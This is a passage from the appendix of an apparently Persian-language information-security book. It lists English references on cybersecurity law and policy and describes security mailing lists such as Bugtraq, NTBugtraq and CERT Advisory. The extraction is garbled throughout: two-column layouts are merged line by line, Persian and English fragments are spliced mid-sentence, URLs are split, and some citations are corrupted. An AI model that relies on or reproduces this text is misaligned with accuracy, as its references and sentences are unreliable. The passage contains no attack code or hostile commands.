Economic And Social Committee and the Myriam Dunn, Center for Security
Committee of the Regions - Network and Studiesand Conflict Research, Swiss
Information Security: Proposal for a Federal Institute of Technology (2002):
European Policy Approach, June 6, 2001, http://www.isn.ethz.ch/crn
COM(2001) 298 final,
http://europa.eu.int/information_society/eeurop U.S. Presidential Decision Directive 63:
e/news_library/new_documents/index_en.htm Critical Infrastructure Protection, May 22,
1998;
European Commission, Communication http://www.fas.org/irp/offdocs/pdd-63.htm
from the Commission to the Council, the
European Parliament, the Economic and
Social Committee and the Committee on the
501 Electronic Attack Response Group
٤٧٥ ﭘﻴﻮﺳﺘﻬﺎ
Michael Nugent, It Can’t Happen Here, Wall Regions - Creating a Safer Information
Street Technology Association, Ticker, A Society by Improving the Security of
Technology Magazine For Industry Information Infrastructures and Combating
Profession (2003), Computer-related Crime, Jan. 26, 2001,
http://www.wsta.org/publications/articles/040 COM(20000) 890 final,
2_article03.html http://europa.eu.int/ISPO/eif/InternetPolicies
Site/Crime/CrimeCommEN.html
Carol A. Siegel, Ty R. Sagalow, Paul
Serritella, Cyber Risk Management Homeland Security Act,
Technical and Insurance Controls for http://www.whitehouse.gov/deptofhomeland/
Enterprise-Level Security, Security analysis/
Management Practices, pg. 42,
(September/October 2002). Federal Information Security Management
http://www.gsu.edu/~accrss/Security_and_B Act, Title IIIof E-Government Act of 2002,
usiness_Risk.pdf. Pub. Law 107-347,
http://csrc.nist.gov/policies/FISMA-final.pdf.
ﻃﻴﻒ ﻭﺳـﻴﻌﻲ٥٠٢(CSRC) NIST ﻣﺮﻛﺰ ﻣﻨﺎﺑﻊ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ Thomas J. Smedinghoff, The Developing
،ﺍﺯ ﻣﻄﺎﻟﺐ ﺍﻣﻨﻴﺘﻲ ﺷﺎﻣﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ U.S. Legal Standard for Cyber-security,
Baker & McKenzie, Chicago,
ﻗﺎﺑﻠﻴـﺖ، ﺳﻴﺴﺘﻤﻬﺎﻱ ﮔـﻮﺍﻫﻲ، ﺗﺤﻘﻴﻘﺎﺕ ﺍﻣﻨﻴﺘﻲ،ﺁﺯﻣﻮﻥ ﺍﻣﻨﻴﺖ
http://www.bmck.com/ecommerce/us%20cy
ﺍﻣﻨﻴـﺖ، ﺑﺎﺯﮔﺸﺖ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ،ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻢ ber-security%20standards.pdf
ﻭ ﻧﻴﺰ ﺗﺠﺎﺭﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺭﮔﺎﻧﻬﺎﻱ ﻣﻠـﻲ،ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺸﺎﻏﻞ ﻛﻮﭼﻚ
ﻛﻤﻴﺴﻴﻮﻥ ﺣﻔﺎﻇﺖ ﻭ ﻣﺒﺎﺩﻻﺕﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻋﻠﻴـﻪ ﺷـﺮﻛﺘﻬﺎﻳﻲ
ﭘﺎﻳﮕــﺎﻩ ﻭﺏ.(http://csrc.nist.gov/) ﺭﺍ ﻣﻨﺘــﺸﺮ ﻛــﺮﺩﻩ ﺍﺳــﺖ
ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ
: ﻧﻴﺰ ﺩﺭ ﺁﺩﺭﺱ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖNIST ﺍﻧﺘﺸﺎﺭﺍﺕ
http://csrc.nist.gov/publications/index.html
ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻣﺤﻔﺎﻇﺖ ﺑﻌﻤﻞ ﻧﻤـﻲﺁﻭﺭﻧـﺪ ﺍﻗـﺪﺍﻣﺎﺕ ﻗـﺎﻧﻮﻧﻲ
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﻣﻨﺒـﻊ ﺯﻳـﺮ.ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ
National Security Agency, Security :ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ
Recommendation Guides,
http://nsa1.www.conxion.com/
SEC v. National Business Communications
CERT/Coordination Center, Software Corp., SEC Litig. Release No. 11223, Sept.
Engineering Institute, Carnegie Mellon 19, 1986, SEC Litig. Release No. 11229,
University, http://www.cert.org/ Sept. 26, 1986. In the Matter of Material
Sciences Corporation, SEC Litig. Release
European Commission, Communication No. 41930, Sept. 28, 1999.
from the Commission to the Council, the
European Parliament, the European Sarbanes-Oxley Act of 2002, Pub. Law 107-
Economic And Social Committee and the 204.
Committee of the Regions - Network and
Information Security: Proposal for a http://www.aicps.org; http://www.isaca.org.
European Policy Approach, June6, 2001,
COM(2001) 298 final, ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ،ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﻭﺷﻦ ﺷـﺪ
http://europa.eu.int/information_society/eeurop ﺩﺭ ﺯﻣﻴﻨـــﺔ ﺍﻣﻨﻴـــﺖOECD ﺍﺯ ﺭﻫﻨﻤﻮﻧﻬـــﺎﻱ- ﺭﺍﻳﺎﻧـــﻪﺍﻱ
e/news_library/new_documents/index_en.htm
ﺑﺨﺶ ﺷﺸﻢ
the Eighth Session, Apr. 27-May 6, 1999, COM(2003) 63 final, 2003/0032 (COD),
E/CN.15/1999/12, http://europa.eu.int/information_society/eeurop
http://www.un.org/documents/ecosoc/docs/1 e/action_plan/safe/documents/nisa_en.pdf
999/e1999-30.htm.
Proposal for a Regulation of the European
UN, International Review of Criminal Policy - Parliament and of the Council Establishing
United Nations Manual on the Prevention the European Network and Information
and Control of Computer-Related Crime, Security Agency, Commission of the
http://www.uncjin.org/Documents/EighthCon European Communities, Feb. 11, 2003,
gress.html COM(2003) 63 final, 2003/0032 (COD),
http://europa.eu.int/information_society/eeurop
ﮔﺰﺍﺭﺵ ﻛﻤﻴﺴﻴﻮﻥ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺍﺟﺘﻤﺎﻋﻲ ﺷﻮﺭﺍﻱ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻥ e/action_plan/safe/documents/nisa_en.pdf
ﻣﻠﻞ ﺩﺭ ﺯﻣﻴﻨﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻋﺪﺍﻟﺖ ﻣﺠﺮﻣﺎﻧـﻪ ﻛـﻪ Protecting Developing Economies from
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﻭ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺣﻮﺯﺓ Cyber Attack – Assistance to Build Regional
Cyber-security Preparedness, APEC Media
:ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ ﻭ ﺍﻣﻨﻴﺖ ﻣﺠﺎﺯﻱ ﺭﺍ ﺧﻼﺻﻪ ﻛﺮﺩﻩ ﺍﺳﺖ Release, Mar. 18, 2003,
Effective measures to prevent and control http://www.apecsec.org.sg/whatsnew/press/Press
computer-related crime, E/CN.15/2002/8, Rel_ProtectgFromCyberAttack_180303.html
Report of the Secretary-General, United
Nations, Economic and Social Council, http://www.ncs.gov/NSTAC/attf.html
Commission on Crime Prevention and
Criminal Justice, Eleventh Session, Vienna, Jody R. Westby, ed., International Guide to
Apr. 16-25, 2002, Combating Cybercrime, AmericanBar
http://www.unodc.org/pdf/crime/commissions Association, Section of Science &
/11comm/8e.pdf Technology Law, Privacy & Computer Crime
Committee, by The American Bar
Gramm-Leach Bliley Act, 15 USC, Association’s Privacy & Computer Crime
Subchapter 1, § 6801. Committee 2003,
http://www.abanet.org/abapubs/books/cyber
Appendix B to Part 570—Interagency crime/
Guidelines Establishing Standards for
Safeguarding Customer Information, Part III, UN General Assembly, Resolution 55/63,
http://www.occ.treas.gov/fr/fedregister/66fr8 Combating the criminal misuse of
616.htm information technologies, Dec. 4, 2000,
http://www.nvk2000.ru/apec/documents/Inter
Financial Institutions and Customer Data: national_Agreements/55-63_English.pdf
Complying with the Safeguards Rule,
http://www.ftc.gov/bcp/conline/pubs/buspubs UN General Assembly, Resolution 56/121,
/safeguards.htm Combating the criminal misuse of
information technologies, Jan. 23, 2002,
Standards for Safeguarding Customer http://ods-dds-ny.un.org/doc/UNDOC/
Information, 67 Fed. Reg. 36484-94, May
23, 2000, (codified at 16 C.F.R. Part 314), ETS no. 185:
http://www.ftc.gov/os/2002/05/67fr36585.pdf http://conventions.coe.int/treaty/EN/cadrepri
ncipal.htm
Technology Risk Management Guidelines
for FinancialInstitutions, Monetary Authority Eighth United Nations Congress on the
of Singapore, Draft Nov. 11, 2002, Prevention of Crime and the Treatment of
http://www.mas.gov.sg/display.cfm?id=94D0 Offenders, Havana, Aug. 27- Sept. 7, 1990,
63CD-5EB6-4636-82B5A725F9F6E9F5 report prepared by the Secretariat, UN
publication, Sales No. E.91.IV.2, chap I.
45 CFR §160, 162, 164;
http://www.cms.hhs.gov/hipaa/hipaa2/regula : ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ،ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻣﺘﻦ ﺍﻳﻦ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ
tions/security/default.asp United Nations Commission on Crime
Prevention and Criminal Justice, Report on
٤٧٧ ﭘﻴﻮﺳﺘﻬﺎ
ﺑﺨﺶ ﭘﻨﺠﻢ
http://news.cnet.com/news/0-1005-200-
4523277.html
http://www.wired.com/news/technology/0,12
82,34496,00.html
ﺑﺨﺶ ﺷﺸﻢ
http://www.microsoft.com/technet/security/bu
lletin/MS01-017.asp
٤٧٩ ﭘﻴﻮﺳﺘﻬﺎ
ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺁﻧﻬﺎ )ﮔﺮﭼﻪ ﻫﺪﻑ ﺑﻴﺸﺘﺮ ﺍﻋﻀﺎﻱ ﺁﻥ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ﺑﺎﻳﮕﺎﻧﻲ،
ﻫﻤﻴﻦ ﺍﻣﺮ ﺍﺳﺖ( .ﺑﺮﺍﻱ ﻋﻀﻮﻳﺖ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭘﻴﺎﻣﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﺯﻫﺎ ﻭ ﻫﻔﺘﻪﻫﺎ )ﻭ ﻳﺎ ﺣﺘﻲ ﺯﻣﺎﻥ
ﺑــــﻪ ﭘﺎﻳﮕــــﺎﻩ ﻭﺏ http://www.securityfocus.com ﺑﻴﺸﺘﺮﻱ( ﻧﮕﻪ ﺩﺍﺭﻳﺪ.
ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ .ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﻪ ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻣـﺎ ﻧﻜـﺎﺕ
ﻧﺎﺻﺤﻴﺢ ﻭ ﻧﺎﺩﺭﺳـﺘﻲ ﺭﺍ ﻧﻴـﺰ ﺩﻳـﺪﻩ ﻭ ﺷـﻨﻴﺪﻩﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺑﺎﻻﺧﺮﻩ ﺍﻳﻨﻜﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﭘـﺴﺘﻲ ﺍﻣﻨﻴﺘـﻲ ،ﺍﻣﻜـﺎﻥ
ﻓﻬﺮﺳﺖ ﺍﺭﺳﺎﻝ ﺷﺪﻩﺍﻧﺪ .ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺁﻣﺎﺩﻩﺍﻧﺪ ﺍﺷﺘﺒﺎﻫﺎﺕ ﭘﻴﺎﻣﻬﺎﻱ ﻋﻀﻮﻳﺖ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺭﻭﺯﺍﻧﺔ ﺧﻼﺻـﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﻧﻴـﺰ
ﻻ ﻋﻼﻗـﺔ ﭘﺴﺖﺷﺪﻩ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺘﻬﺎ ﺭﺍ ﻛـﺸﻒ ﻛﻨﻨـﺪ ﻣﻌﻤـﻮ ﹰ ﻻ ﻫﺮ ﺭﻭﺯ ﻳـﻚ ﭘﻴـﺎﻡ ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺍﻧﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻋﻀﺎ ﻣﻌﻤﻮ ﹰ
ﺧﺎﺻﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻫﻮﻳﺖ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺭﺍ ﻓﺎﺵ ﻧﻜﻨﻨﺪ .ﺍﮔﺮ ﻧﮕـﺮﺍﻥ ﻭﺍﺣﺪ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﺗﻤﺎﻡ ﭘﻴﺎﻣﻬـﺎﻱ ﺁﻥ ﺭﻭﺯ
ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻴﺪ ،ﺑﺎ ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮﻱ ﺑﻪ ﺍﻳﻦ ﻓﻬﺮﺳـﺘﻬﺎ ﭘﻴـﺎﻡ ﺭﺍ ﺩﺭ ﺑﺮ ﺩﺍﺭﺩ .ﻣﺪﻳﺮﻳﺖ ﺍﻳﻦ ﭼﻜﻴﺪﻩﻫﺎ ﺑﺴﻴﺎﺭ ﺁﺳـﺎﻧﺘﺮ ﺍﺯ ﺗﻔﻜﻴـﻚ
ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ. ﭘﻴﺎﻣﻬﺎﻱ ﺭﻭﺯﺍﻧﺔ ﻣﺠﺰﺍ ﻣﻲﺑﺎﺷﺪ .ﺍﻟﺒﺘﻪ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﻫﻨﮕﺎﻣﻲ ﺑﻪ ﻧﻘﺎﻁ ﺿﻌﻒ ﭘﻲ ﺑﺒﺮﻳﺪ ﻛﻪ ﺳﺎﻳﺮ ﺭﺍﻫﺒﺮﺍﻥ ﻭ ﻣﻬﺎﺟﻤﺎﻥ
SecurityFocusﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ ﺩﺍﺭﺩ ﻛـﻪ ﺳﻴﺴﺘﻢ ﺍﺯ ﺳﺎﻋﺘﻬﺎ ﻗﺒﻞ ﺍﺯ ﺁﻥ ﺑﻪ ﺁﻧﻬﺎ ﻭﺍﻗﻒ ﺷﺪﻩﺍﻧﺪ.
ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﻳﺮ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺖ )ﻣﺜﻞ ﻣﻬﺎﺟﻢﻳﺎﺑﻬﺎ ،ﻛﻮﺯﻩﻫﺎﻱ ﻋﺴﻞ ،ﺍﻧـﻮﺍﻉ
ﻭﻳﺮﻭﺳﻬﺎ( ﻭ ﻳﺎ ﺍﻧﻮﺍﻉ ﺧـﺎﺹ ﺳﻴـﺴﺘﻤﻬﺎﻱ ) Unixﻣﺜـﻞ Linuxﻳـﺎ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻭ ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛﻨﺶ ﻣﻌﺘﺒﺮ
ﺳﻴﺴﺘﻤﻬﺎﻱ (Sunﻣﻲﺷﻮﺩ .ﻳﻚ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺟﺬﺍﺏ ،ﻓﻬﺮﺳـﺖ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻧﺘـﺸﺎﺭ
ﭘﺴﺘﻲ "ﺭﺧﺪﺍﺩﻫﺎ" ) (incidentsﺍﺳـﺖ ﻛـﻪ ﻣﺨـﺼﻮﺹ ﮔـﺰﺍﺭﺵ
ﭘﻴــﺸﻨﻬﺎﺩﺍﺕ ﻭ ﻫــﺸﺪﺍﺭﻫﺎﻱ ﺧــﻮﺩ ﻓﻬﺮﺳــﺘﻬﺎﻱ ﭘــﺴﺘﻲ ﺩﺍﺭﻧــﺪ.
ﺣﻤﻼﺕ ﻭ ﻧﻔﻮﺫﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻣـﻲﺑﺎﺷـﺪ؛ ﻛـﻪ ﺑـﻪ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻧﺘـﺸﺎﺭ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻭ ﺍﺭﺍﺋـﻪ
ﺷﺮﻛﺖ Symantecﺗﻌﻠﻖ ﺩﺍﺭﺩ.
ﻣﺸﺎﻭﺭﻩ ﺩﺭ ﺯﻣﻴﻨﺔ ﻣﺤﺼﻮﻻﺕ ﺧـﻮﺩ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﭘـﺴﺘﻲ ﺩﺍﺭﻧـﺪ،
NTBugtraq ﻣﺜــﻞ ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﺭﺍﻳﺎﻧــﻪ ،ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ،ﻭ
ﻳﻚ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺑﺪﻭﻥ ﺳﺮﺩﺑﻴﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑـﺮﺍﻱ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ )ﺷﺎﻣﻞ ﺑﺮﺧﻲ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ) Windows NTﺷﺎﻣﻞ ﻧﺴﺨﻪﻫﺎﻱ 2000 ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺷﺘﺮﺍﻛﻲ( .ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﻓﺮﻭﺷﻨﺪﺓ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ
ﻭ .(XPﻣﺒﺎﺣﺚ ﻏﻴﺮ ﻣﺮﺗﺒﻂ ﺑﺎ NTﺟﺰﺀ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﭘﺲ ﺍﺯ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻭﺟﻮﺩ ﭼﻨﻴﻦ ﻓﻬﺮﺳـﺘﻲ ،ﺑـﻪ
ﭘﺴﺘﻲ ﻧﻤﻲ ﺑﺎﺷﻨﺪ .ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛـﻪ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ ﺍﺯ ﺁﻥ ﻣﻠﺤﻖ ﺷﻮﻳﺪ .ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑـﺮﺍﻱ ﻋـﻀﻮﻳﺖ ﺩﺭ ﻓﻬﺮﺳـﺖ
ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﺑﻪ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ Bugtraqﺷﺒﻴﻪ ﺍﺳﺖ .ﺑـﺮﺍﻱ ﭘﺴﺘﻲ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ،ﻛﺎﻓﻲ ﺍﺳﺖ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳـﺮ
ﻋﻀﻮﻳﺖ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘـﺴﺘﻲ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ ﻣﺮﺍﺟﻌﻪ ﻭ ﺩﺭ ﺁﻥ ﺛﺒﺖ ﻧﺎﻡ ﻧﻤﺎﻳﻴﺪ:
ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ: http://register.microsoft.com/regsys/pic.asp
http://www.ntbugtraq.com
ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻣﻬﻢ
CERT Advisory ﺩﺭ ﺍﻳﻨﺠﺎ ﺑﻪ ﭼﻨﺪ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻬﻢ ﺍﺷﺎﺭﻩ ﻣﻲﺷﻮﺩ.
ﺗﻮﺻـــﻴﻪﻫـــﺎﻱ ﺟﺪﻳـــﺪ ﻣﺮﻛـــﺰ ﻫﻤﺎﻫﻨﮕﻴﻬـــﺎﻱ CERT
) (CERT/CCﺩﺭ ﻣــﻮﺭﺩ ﺍﺷــﻜﺎﻻﺕ ﻭ ﻭﺻــﻠﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ Bugtraq
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ ﺩﺭﺝ ﻣـﻲﺷـﻮﺩ. ﻳﻚ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﺑﺪﻭﻥ ﺳﺮﺩﺑﻴﺮ )ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺩﺭ ﺁﻥ ﻧﻴﺎﺯﻱ ﺑﻪ ﺗﺄﻳﻴﺪ
ﻻ
ﻣﻄﺎﻟﻌﻪ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺗﺎ ﺣﺪﻱ ﺧﺴﺘﻪﻛﻨﻨﺪﻩ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻣﻌﻤﻮ ﹰ ﺳﺮﺩﺑﻴﺮ ﻧﺪﺍﺭﺩ( ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺖ .ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ
ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺁﻥ ﺁﻧﻘﺪﺭ ﺟﺰﺋﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻧﻤـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﭘــﺴﺘﻲ ﻣﺒﺎﺣــﺎﺙ ﻣــﺸﺮﻭﺡ ﺩﺭ ﺧــﺼﻮﺹ ﺭﺧﻨــﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ
ﻫﺪﻑ ﺁﻧﻬﺎ ﺭﺍ ﻣﺘﻮﺟﻪ ﺷﺪ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ،ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﻫﻢ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Unixﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ :ﺭﺧﻨﻪﻫﺎ ﭼﻪ ﻫﺴﺘﻨﺪ ،ﭼﮕﻮﻧـﻪ
ﻣﺰﺍﻳﺎﻱ ﺧﺎﺹ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ .ﺑـﺮﺍﻱ ﻋـﻀﻮﻳﺖ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻛﺮﺩ ،ﻭ ﺑﺎ ﭼﻪ ﺭﻭﺷﻲ ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬـﺎ
ﭘﺴﺘﻲ ،ﺩﺭﺧﻮﺍﺳﺖ ﻋﻀﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺍﺻﻼﺡ ﻧﻤﻮﺩ .ﻫـﺪﻑ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ ﺷـﺎﻣﻞ ﺗﻌﺮﻳـﻒ،
majordomo@cert.orgﺑﻔﺮﺳــﺘﻴﺪ ﻭ ﺩﺭ ﻣــﺘﻦ ﭘﻴــﺎﻡ ﺧــﻮﺩ ﺗﺸﺨﻴﺺ ،ﻭ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔـﺮﻓﺘﻦ
ﻋﺒﺎﺭﺕ " "subscribe cert-advisoryﺭﺍ ﻗﻴﺪ ﻛﻨﻴﺪ. ﻣﺸﻜﻼﺕ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ ﻭ ﻧﻪ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻳـﺎ
٤٨١ ﭘﻴﻮﺳﺘﻬﺎ
ﺷﺒﻜﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭﺑﺮ ﻣﻲﮔﻴﺮﺩ .ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌﺔ ﺑﺎﻳﮕﺎﻧﻲ ﻭ ﻳﺎ ﻋـﻀﻮﻳﺖ ﺑﺎﻳﮕﺎﻧﻲ ﺗﻮﺻﻴﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﮔﺬﺷﺘﻪ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳـﺮ
ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺁﺩﺭﺱ ﺯﻳﺮ ﺑﺮﻭﻳﺪ: ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
http://honor.icsalabs.com/mailman/listinfo/fir http://www.cert.org/nav/alerts.html
ewall-wizards
Computer Underground Digest
RISKS ﻳــﻚ ﻣﺠﻤﻮﻋــﺔ ﻧــﺎﺩﺭ ﺍﺯ ﺗﻮﺻــﻴﻪﻫــﺎﻱ ﺍﺭﺳــﺎﻟﻲ ﺩﺭ ﺧــﺼﻮﺹ
